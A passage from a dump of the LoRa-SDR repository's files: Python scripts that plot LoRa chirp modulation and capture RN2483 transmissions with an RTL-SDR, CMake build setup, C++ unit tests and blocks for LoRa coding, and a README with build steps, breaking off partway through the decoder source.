"text": "import os\nimport sys\nimport math\nimport cmath\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef modulate(N, sym=0, numSamps=None):\n if numSamps is None: numSamps = N\n phase = -math.pi\n samps = list()\n accum = 0\n off = (2*math.pi*sym)/N\n for i in range(numSamps):\n accum += phase + off\n samps.append(cmath.rect(1.0, accum))\n phase += (2*math.pi)/N\n return np.array(samps)\n\nif __name__ == '__main__':\n\n ####################################################################\n ## showing modulation basics\n ####################################################################\n SF = 8\n N = 1 << SF\n syms = [0, 0, 50, 100, 200]\n chirps = np.concatenate([modulate(N, sym) for sym in syms])\n fmdemod = np.angle(chirps[1:] * np.conj(chirps)[:-1])\n clock = np.concatenate([[3]+[0]*((1<<SF)-1) for i in range(len(syms))])\n\n fig = plt.figure(figsize=(20, 5))\n\n ax = fig.add_subplot(2, 1, 1)\n ax.set_title('Raw modulated I and Q: SF = %d, symbols=%s'%(SF, syms))\n ax.plot(np.arange(0, chirps.size, 1), np.real(chirps))\n ax.plot(np.arange(0, chirps.size, 1), np.imag(chirps))\n ax.grid(True)\n ax.set_xlim(0, chirps.size)\n\n ax = fig.add_subplot(2, 1, 2)\n ax.set_title('Frequency demodulated: SF = %d, symbols=%s'%(SF, syms))\n ax.plot(np.arange(0, fmdemod.size, 1), fmdemod)\n ax.plot(np.arange(0, len(syms)*(N), N), [0]*len(syms), 'xk', markersize=20)\n ax.grid(True)\n ax.set_xlim(0, chirps.size)\n\n outPath = '/tmp/plot0_mod.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n\n ####################################################################\n ## showing demodulation basics\n ####################################################################\n\n downchirp = np.conj(modulate(N))\n chirps = np.concatenate([modulate(N)[N/4:], chirps])\n dechirped = np.array([])\n i = 0\n outsyms = list()\n clock = list()\n ffts = list()\n while i <= chirps.size-(N):\n #print i\n chunk = chirps[i:i+(1 <<SF)] * downchirp\n value = np.argmax(np.abs(np.fft.fft(chunk)))\n outsyms.append(value)\n ffts.append(np.abs(np.fft.fft(chunk)))\n #print \"val\", value\n total = N\n #use this as the offset\n if i == 0: total -= value\n dechirped = np.concatenate([dechirped, chunk[:total]])\n clock.append(i)\n i += total\n fmdemod = np.angle(dechirped[1:] * np.conj(dechirped)[:-1])\n\n fig = plt.figure(figsize=(20, 5))\n\n ax = fig.add_subplot(2, 1, 1)\n ax.set_title('De-chirped I and Q: SF = %d'%(SF,))\n ax.plot(np.arange(0, dechirped.size, 1), np.real(dechirped))\n ax.plot(np.arange(0, dechirped.size, 1), np.imag(dechirped))\n ax.grid(True)\n ax.set_xlim(0, dechirped.size)\n\n ax = fig.add_subplot(2, 1, 2)\n ax.set_title('Frequency demodulated: SF = %d'%(SF,))\n ax.plot(np.arange(0, fmdemod.size, 1), fmdemod)\n ax.plot(clock, [0]*len(clock), 'xk', markersize=20)\n ax.grid(True)\n ax.set_xlim(0, dechirped.size)\n\n outPath = '/tmp/plot1_demod.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n\n fig = plt.figure(figsize=(20, 5))\n\n for i, fft in enumerate(ffts):\n ax = fig.add_subplot(2, 3, i+1)\n ax.set_title('FFT for symbol #%d, detected %d'%(i,outsyms[i]), fontsize=12)\n ax.plot(np.arange(0, fft.size, 1), fft)\n ax.plot([outsyms[i]], [fft[outsyms[i]]], 'xk', markersize=20)\n ax.grid(True)\n 
ax.get_yaxis().set_ticks([0, 100, 200, 300])\n #ax.tick_params(axis='both', which='major', labelsize=10)\n #ax.tick_params(axis='both', which='minor', labelsize=8)\n ax.set_xlim(0, N-1)\n ax.get_xaxis().set_ticks(np.arange(0, N, 64))\n\n outPath = '/tmp/plot2_ffts.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n"
},
{
"alpha_fraction": 0.42247799038887024,
"alphanum_fraction": 0.42586323618888855,
"avg_line_length": 30.4255313873291,
"blob_id": "a1e3c3531f288022c91391660e64218a82d317a0",
"content_id": "84dbf860ed2e82d1e3241f54efc7fbb9ac5efd84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1477,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 47,
"path": "/CMakeLists.txt",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "########################################################################\n# Project setup\n########################################################################\ncmake_minimum_required(VERSION 2.8.9)\nproject(LoRa_Blocks CXX)\n\nfind_package(Pothos \"0.6\" CONFIG REQUIRED)\n\n########################################################################\n## Compiler specifics\n########################################################################\nenable_language(C)\ninclude(CheckIncludeFiles)\nCHECK_INCLUDE_FILES(alloca.h HAS_ALLOCA_H)\nif(HAS_ALLOCA_H)\n add_definitions(-DHAS_ALLOCA_H)\nendif(HAS_ALLOCA_H)\n\n########################################################################\n# json.hpp header\n########################################################################\nfind_path(JSON_HPP_INCLUDE_DIR NAMES json.hpp PATH_SUFFIXES nlohmann)\n\nif (NOT JSON_HPP_INCLUDE_DIR)\n message(FATAL_ERROR \"LoRa toolkit requires json.hpp, skipping...\")\nendif (NOT JSON_HPP_INCLUDE_DIR)\n\ninclude_directories(${JSON_HPP_INCLUDE_DIR})\n\n########################################################################\n## LoRa blocks\n########################################################################\nPOTHOS_MODULE_UTIL(\n TARGET LoRa_Blocks\n SOURCES\n LoRaDemod.cpp\n LoRaMod.cpp\n LoRaEncoder.cpp\n LoRaDecoder.cpp\n TestLoopback.cpp\n TestGen.cpp\n BlockGen.cpp\n TestCodesSx.cpp\n TestDetector.cpp\n DESTINATION lora\n ENABLE_DOCS\n)\n"
},
{
"alpha_fraction": 0.5123416781425476,
"alphanum_fraction": 0.5411032438278198,
"avg_line_length": 28.30188751220703,
"blob_id": "187f2dcbb8d4a79d2615d1b37d25dcd6ed456d14",
"content_id": "089fff48be6f835dbbcade50cf051e10c56e9028",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4659,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 159,
"path": "/TestCodesSx.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming84_sx)\n{\n bool error;\n bool bad;\n unsigned char decoded;\n\n //test hamming 84 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming84sx(byte);\n\n //check no bit errors\n error = false;\n bad = false;\n decoded = decodeHamming84sx(encoded, error, bad);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_TRUE(not bad);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n error = false;\n bad = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming84sx(encoded1err, error, bad);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_TRUE(not bad);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit1 = 0; bit1 < 8; bit1++)\n {\n if (bit1 == bit0) continue;\n\n //check 2 bit errors (cant correct, but can detect\n error = false;\n bad = false;\n unsigned char encoded2err = encoded1err ^ (1 << bit1);\n decoded = decodeHamming84sx(encoded2err, error, bad);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_TRUE(bad);\n }\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming74_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 74 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming74sx(byte);\n\n //check no bit errors\n error = false;\n decoded = decodeHamming74sx(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 7; bit0++)\n {\n //check 1 bit error\n error = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming74sx(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_EQUAL(byte, decoded);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_parity64_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test parity 64, see if bit error detected\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeParity64(byte);\n\n //check no bit errors\n error = false;\n decoded = checkParity64(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = checkParity64(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_parity54_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test parity 54, see if bit error detected\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeParity54(byte);\n\n //check no bit errors\n error = false;\n decoded = checkParity54(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = checkParity54(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_interleaver_sx)\n{\n for (size_t PPM = 7; PPM <= 12; PPM++)\n {\n std::cout << \"Testing PPM \" << PPM << std::endl;\n for (size_t RDD = 0; RDD <= 4; RDD++)\n {\n std::cout << \" with RDD \" << RDD << std::endl;\n std::vector<uint8_t> inputCws(PPM);\n const auto mask = (1 << (RDD+4))-1;\n for 
(auto &x : inputCws) x = std::rand() & mask;\n\n std::vector<uint16_t> symbols(((RDD+4)*inputCws.size())/PPM);\n diagonalInterleaveSx(inputCws.data(), inputCws.size(), symbols.data(), PPM, RDD);\n\n std::vector<uint8_t> outputCws(inputCws.size());\n diagonalDeterleaveSx(symbols.data(), symbols.size(), outputCws.data(), PPM, RDD);\n\n POTHOS_TEST_EQUALV(inputCws, outputCws);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5722455382347107,
"alphanum_fraction": 0.6038886904716492,
"avg_line_length": 24.97029685974121,
"blob_id": "e9092e5216ea1699b082064d36be429983a23120",
"content_id": "06d532952c8bcd2ea0d09edf1dd76146e9ee36b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2623,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 101,
"path": "/BlockGen.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n\n/***********************************************************************\n* |PothosDoc LoRa Block Gen\n*\n* Generate test blocks for the LoRa modulator for testing purposes.\n*\n* |category /LoRa\n* |keywords lora\n*\n* |param elements Specify a list of elements to produce.\n* |default [100, 200, 300, 400, 500, 600 ,700, 800]\n*\n* |param ws[Word Size] The number of error correction bits.\n* |option [8] \"8\"\n* |option [16] \"16\"\n* |option [32] \"32\"\n* |default \"16\"\n*\n* |factory /lora/block_gen()\n* |setter setElements(elements)\n* |setter setWordSize(ws)\n*\n**********************************************************************/\nclass BlockGen : public Pothos::Block\n{\npublic:\n\tBlockGen(void) : _ws(1) {\n\t\tthis->setupOutput(0);\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setElements));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setTrigger));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setWordSize));\n\t}\n\n\tvoid setElements(const std::vector<uint32_t> &elems) {\n\t\t_elements = elems;\n\t\t_active = true;\n\t}\n\n\tvoid setTrigger(const int value) {\n\t\t_active = true;\n\t}\n\n\tstatic Block *make(void){\n\t\treturn new BlockGen();\n\t}\n\n\tvoid setWordSize(const std::string &ws){\n\t\tif (ws == \"8\") _ws = 0;\n\t\telse if (ws == \"16\") _ws = 1;\n\t\telse if (ws == \"32\") _ws = 2;\n\t\telse throw Pothos::InvalidArgumentException(\"LoRaBlockGen::setWordSize(\" + ws + \")\", \"unknown word size\");\n\t}\n\n\tvoid activate(void){\n\t\t_active = true;\n\t}\n\n\tvoid work(void){\n\t\tif (!_active) return;\n\t\t_active = false;\n\t\tPothos::Packet outPkt;\n\t\tif (0 == _ws) {\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint8_t), _elements.size());\n\t\t\tuint8_t *p = msgBuff.as<uint8_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i] & 0xff;\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}else if (1 == _ws){\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint16_t), _elements.size());\n\t\t\tuint16_t *p = msgBuff.as<uint16_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i] & 0xffff;\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}else {\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint32_t), _elements.size());\n\t\t\tuint32_t *p = msgBuff.as<uint32_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i];\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}\n\t\t\n\t\tthis->output(0)->postMessage(outPkt);\n\t}\n\nprivate:\n\t//configuration\n\tbool _active;\n\tsize_t _ws;\n\tstd::vector<uint32_t> _elements;\n};\n\nstatic Pothos::BlockRegistry registerBlockGen(\n\t\"/lora/block_gen\", &BlockGen::make);\n"
},
{
"alpha_fraction": 0.5820895433425903,
"alphanum_fraction": 0.6204690933227539,
"avg_line_length": 26.861385345458984,
"blob_id": "1e5fdb0d17407433def6cea79db4078598ad69be",
"content_id": "245f27e68229c8c1a23f6c4ca8286fb9f748711f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2814,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 101,
"path": "/RN2483Capture.py",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport math\nimport cmath\nimport wave\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport SoapySDR\nfrom SoapySDR import *\nimport RN2483\n\nSDR_ARGS = 'driver=rtlsdr'\nSDR_RATE = 2*1024e3\nSDR_THRESH = 0.01\nTTY_PORT = '/dev/ttyACM0'\nFREQ = 868.1e6\nBW = 250e3\nSF = 8\nRDD = 4\nSYNC = 0x83\n\ndef transmitAndCollect(rn2483, sdr, rxStream, payload):\n \"\"\"\n Transmit the specified payload over the RN2483\n and receive through the RTLSDR device.\n \\return a numpy array with LoRa samples\n \"\"\"\n buff = np.array([0]*1024, np.complex64)\n\n #flush\n while True:\n sr = sdr.readStream(rxStream, [buff], len(buff))\n if sr.ret == SOAPY_SDR_TIMEOUT: break\n\n sdr.activateStream(rxStream) #start streaming\n\n for i in range(16):\n sdr.readStream(rxStream, [buff], len(buff))\n\n rn2483.transmit(payload)\n\n #receive some samples\n loraSamples = np.array([])\n while True:\n sr = sdr.readStream(rxStream, [buff], len(buff))\n assert(sr.ret > 0)\n found = np.std(buff) > SDR_THRESH\n if not found and not loraSamples.size: continue\n loraSamples = np.concatenate((loraSamples, buff))\n if not found: break\n\n sdr.deactivateStream(rxStream) #stop streaming\n\n return loraSamples\n\nif __name__ == '__main__':\n\n ####################################################################\n #connect to devices\n rn2483 = RN2483.RN2483(TTY_PORT)\n rn2483.configLoRa(freq=FREQ,\n bw=int(BW/1e3),\n crc='off',\n cr='4/%d'%(RDD + 4),\n sf='sf%d'%SF,\n sync=SYNC)\n\n sdr = SoapySDR.Device(SDR_ARGS)\n sdr.setFrequency(SOAPY_SDR_RX, 0, FREQ)\n sdr.setSampleRate(SOAPY_SDR_RX, 0, SDR_RATE)\n rxStream = sdr.setupStream(SOAPY_SDR_RX, SOAPY_SDR_CF32)\n\n ####################################################################\n #collect data and plot\n loraSamples = transmitAndCollect(rn2483, sdr, rxStream, ''.join([chr(0xff)]*8))\n print(\"Found %d samples\"%loraSamples.size)\n\n loraSamples = loraSamples[15000:25000] #just a few for plotting purposes\n resampled = scipy.signal.resample(loraSamples, int(BW*loraSamples.size/SDR_RATE))\n fmdemodResamp = np.angle(resampled[1:] * np.conj(resampled)[:-1])\n\n fig = plt.figure(figsize=(40, 10))\n fig.suptitle('Extracted samples', fontsize=12)\n\n ax = fig.add_subplot(1, 1, 1)\n ax.set_title('Raw content')\n ax.plot(np.arange(0, resampled.size, 1), np.real(resampled))\n ax.plot(np.arange(0, resampled.size, 1), np.imag(resampled))\n ax.plot(np.arange(0, fmdemodResamp.size, 1), fmdemodResamp)\n ax.grid(True)\n\n outPath = '/tmp/out.png'\n print(\"Writing plot to %s\"%outPath)\n fig.savefig(outPath)\n plt.close(fig)\n\n sdr.closeStream(rxStream)\n print(\"Done!\")\n exit(0)\n"
},
{
"alpha_fraction": 0.7407827377319336,
"alphanum_fraction": 0.760635256767273,
"avg_line_length": 28.88135528564453,
"blob_id": "c32214951a55bd7a8517a930aa73520fce77785d",
"content_id": "1bc2c76ccfa97855bd7175f90627581e2bfafaa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1763,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 59,
"path": "/README.md",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "# LoRa SDR project\n\nThis project will make use of SDR hardware to receive and decode Lora.\n\n* Blog: https://myriadrf.org/blog/lora-modem-limesdr/\n\n## Repository layout\n\n* LoRa*.cpp - Pothos processing blocks and unit tests\n* RN2483.py - python utility for controlling the RN2483\n* examples/ - saved Pothos topologies with LoRa blocks\n\n## Noise simulation\n\nThis example demonstrates the LoRa PHY blocks\nusing a looback path in the presence of noise.\n\n* examples/lora_simulation.pth - modem simulation\n\n## RN2483 receiver\n\nThis example receives and demodulates raw symbols\nwith logic analyzer plot to view the symbols\nand triggered waveform plots to view the input.\nOnce the example is activated, simply run the RN2483.py\nscript to generate a single waveform to trigger the plots.\n\n* RN2483.py --freq=863.1e6 --bw=0.5e6 --sf=11 --tx=\"hello\"\n* examples/rx_RN2483.pth\n\n## Simple relay\n\nThis example includes a simple client and relay app.\nThe relay receives and decodes messages and\nrelays them into another frequency and sync word.\nThe client can post messages to the relay\nand view the response in a chat box widget.\n\n* examples/lora_sdr_relay.pth - LimeSDR LoRa relay\n* examples/lora_sdr_client.pth - LimeSDR LoRa client\n\n## Building project\n\n* First install Pothos: https://github.com/pothosware/pothos/wiki \n* Install [Poco](https://pocoproject.org/) development files\n * E.g. on Ubuntu: `sudo apt-get install libpoco-doc libpoco-dev`\n* Install [JSON for Modern C++](https://github.com/nlohmann/json) development files\n * E.g. on Ubuntu: `sudo apt-get install -y nlohmann-json-dev`\n* Finally, build the blocks in this repository:\n\n```\ngit clone https://github.com/myriadrf/LoRa-SDR.git\ncd LoRa-SDR\nmkdir build\ncd build\ncmake ../\nmake -j4\nsudo make install\n```\n"
},
{
"alpha_fraction": 0.5875654220581055,
"alphanum_fraction": 0.6084949374198914,
"avg_line_length": 29.86935806274414,
"blob_id": "42383192f957c62464fb4316303b44a0e75b3835",
"content_id": "b3141e9dc0bb96eceb1b366fc56346d1e1e03ff0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 12996,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 421,
"path": "/LoRaDecoder.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// Copyright (c) 2016-2016 Arne Hennig\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n#include \"LoRaCodes.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Decoder\n *\n * Decode LoRa modulation symbols into output bytes.\n * This is a simple decoder and does not offer many options.\n * The job of the decoder is to gray encode to convert measurement error\n * into bit errors, deinterleave, handle error correction, and descramble.\n *\n * <h2>Input format</h2>\n *\n * A packet message with a payload containing LoRa modulation symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Output format</h2>\n *\n * A packet message with a payload containing bytes received.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor sets the bits per symbol.\n * |default 10\n *\n * |param ppm[Symbol size] The size of the symbol set (_ppm <= SF).\n * Specify _ppm less than the spread factor to use a reduced symbol set.\n * The special value of zero uses the full symbol set (PPM == SF).\n * |default 0\n * |option [Full set] 0\n * |widget ComboBox(editable=true)\n * |preview valid\n *\n * |param cr[Coding Rate] The number of error correction bits.\n * |option [4/4] \"4/4\"\n * |option [4/5] \"4/5\"\n * |option [4/6] \"4/6\"\n * |option [4/7] \"4/7\"\n * |option [4/8] \"4/8\"\n * |default \"4/8\"\n *\n * |param explicit Enable/disable explicit header mode.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param hdr[Header Output] Enable/disable header output.\n * |option [On] true\n * |option [Off] false\n * |default false\n *\n * |param dataLength implicit data length.\n * |default 8\n *\n * |param crcc Enable/disable crc check of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default false\n *\n * |param whitening Enable/disable whitening of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param interleaving Enable/disable interleaving of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param errorCheck Enable/disable error checking.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |factory /lora/lora_decoder()\n * |setter setSpreadFactor(sf)\n * |setter setSymbolSize(ppm)\n * |setter setCodingRate(cr)\n * |setter enableExplicit(explicit)\n * |setter enableHdr(hdr)\n * |setter setDataLength(dataLength)\n * |setter enableCrcc(crcc)\n * |setter enableWhitening(whitening)\n * |setter enableInterleaving(interleaving)\n * |setter enableErrorCheck(errorCheck)\n **********************************************************************/\nclass LoRaDecoder : public Pothos::Block\n{\npublic:\n LoRaDecoder(void):\n _sf(10),\n _ppm(0),\n _rdd(4),\n _whitening(true),\n\t\t_crcc(false),\n\t\t_interleaving(true),\n\t\t_errorCheck(false),\n\t\t_explicit(true),\n _hdr(false),\n\t\t_dataLength(8),\n _dropped(0)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setSpreadFactor));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setSymbolSize));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setCodingRate));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableWhitening));\n\t\tthis->registerCall(this, 
POTHOS_FCN_TUPLE(LoRaDecoder, enableCrcc));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableInterleaving));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableExplicit));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableHdr));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setDataLength));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableErrorCheck));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, getDropped));\n\n this->registerSignal(\"dropped\");\n this->setupInput(\"0\");\n this->setupOutput(\"0\");\n }\n\n static Block *make(void)\n {\n return new LoRaDecoder();\n }\n\n void setSpreadFactor(const size_t sf)\n {\n _sf = sf;\n }\n\n void setSymbolSize(const size_t ppm)\n {\n _ppm = ppm;\n }\n\n void setCodingRate(const std::string &cr)\n {\n if (cr == \"4/4\") _rdd = 0;\n else if (cr == \"4/5\") _rdd = 1;\n else if (cr == \"4/6\") _rdd = 2;\n else if (cr == \"4/7\") _rdd = 3;\n else if (cr == \"4/8\") _rdd = 4;\n else throw Pothos::InvalidArgumentException(\"LoRaDecoder::setCodingRate(\"+cr+\")\", \"unknown coding rate\");\n }\n\n void enableWhitening(const bool whitening)\n {\n _whitening = whitening;\n }\n\n\tvoid enableInterleaving(const bool interleaving)\n\t{\n\t\t_interleaving = interleaving;\n\t}\n\n\tvoid enableExplicit(const bool __explicit) {\n\t\t_explicit = __explicit;\n\t}\n \n void enableHdr(const bool hdr) {\n _hdr = hdr;\n }\n\n\tvoid enableErrorCheck(const bool errorCheck) {\n\t\t_errorCheck = errorCheck;\n\t}\n\n\tvoid enableCrcc(const bool crcc)\n\t{\n\t\t_crcc = crcc;\n\t}\n\n\tvoid setDataLength(const size_t dataLength)\n\t{\n\t\t_dataLength = dataLength;\n\t}\n\n unsigned long long getDropped(void) const\n {\n return _dropped;\n }\n\n void activate(void)\n {\n _dropped = 0;\n this->emitSignal(\"dropped\", _dropped);\n }\n\n\tvoid work(void){\n\t\tauto inPort = this->input(0);\n\t\tauto outPort = this->output(0);\n\t\tif (not inPort->hasMessage()) return;\n\n\t\tconst size_t PPM = (_ppm == 0) ? 
_sf : _ppm;\n\t\tif (PPM > _sf) throw Pothos::Exception(\"LoRaDecoder::work()\", \"failed check: PPM <= SF\");\n\n\t\t//extract the input symbols\n\t\tauto msg = inPort->popMessage();\n\t\tauto pkt = msg.extract<Pothos::Packet>();\n \n if (pkt.payload.elements() < N_HEADER_SYMBOLS) return; // need at least a header\n \n\t\tconst size_t numSymbols = roundUp(pkt.payload.elements(), 4 + _rdd);\n\t\tconst size_t numCodewords = (numSymbols / (4 + _rdd))*PPM;\n\t\tstd::vector<uint16_t> symbols(numSymbols);\n\t\tstd::memcpy(symbols.data(), pkt.payload.as<const void *>(), pkt.payload.length);\n\n int rdd = _rdd; //make a copy to be changed in header decode\n\n\t\t//gray encode, when SF > PPM, depad the LSBs with rounding\n\t\tfor (auto &sym : symbols){\n\t\t\tsym += (1 << (_sf - PPM)) / 2; //increment by 1/2\n\t\t\tsym >>= (_sf - PPM); //down shift to PPM bits\n\t\t\tsym = binaryToGray16(sym);\n\t\t}\n\t\t//deinterleave / dewhiten the symbols into codewords\n\t\tstd::vector<uint8_t> codewords(numCodewords);\n\t\tif (_interleaving) {\n\t\t\tsize_t sOfs = 0;\n\t\t\tsize_t cOfs = 0;\n\t\t\tif (rdd != HEADER_RDD) {\n\t\t\t\tdiagonalDeterleaveSx(symbols.data(), N_HEADER_SYMBOLS, codewords.data(), PPM, HEADER_RDD);\n\t\t\t\tif (_explicit) {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + N_HEADER_CODEWORDS, PPM - N_HEADER_CODEWORDS, 0, HEADER_RDD);\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data(), PPM, 0, HEADER_RDD);\n\t\t\t\t}\n\t\t\t\tcOfs += PPM;\n\t\t\t\tsOfs += N_HEADER_SYMBOLS;\n\t\t\t\tif (numSymbols - sOfs > 0) {\n\t\t\t\t\tdiagonalDeterleaveSx(symbols.data() + sOfs, numSymbols-sOfs, codewords.data() + cOfs, PPM, rdd);\n\t\t\t\t\tif (_explicit) {\n\t\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + cOfs, numCodewords - cOfs, PPM-N_HEADER_CODEWORDS, rdd);\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + cOfs, numCodewords - cOfs, PPM, rdd);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\tdiagonalDeterleaveSx(symbols.data(), numSymbols, codewords.data(), PPM, rdd);\n\t\t\t\tif (_explicit) {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data()+N_HEADER_CODEWORDS, numCodewords-N_HEADER_CODEWORDS, 0, rdd);\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data(), numCodewords, 0, rdd);\n\t\t\t\t}\n\t\t\t}\n\t\t/*\n\t\t\tPothos::Packet out;\n\t\t\tout.payload = Pothos::BufferChunk(typeid(uint8_t), numCodewords);\n\t\t\tstd::memcpy(out.payload.as<void *>(), codewords.data(), numCodewords);\n\t\t\toutPort->postMessage(out);\n\t\t\treturn;\n\t\t*/\n\t\t}\n\t\telse {\n\t\t\tPothos::Packet out;\n\t\t\tout.payload = Pothos::BufferChunk(typeid(uint16_t), numSymbols);\n\t\t\tstd::memcpy(out.payload.as<void *>(), symbols.data(), out.payload.length);\n\t\t\toutPort->postMessage(out);\n\t\t\treturn;\n\t\t}\n\n\t\tbool 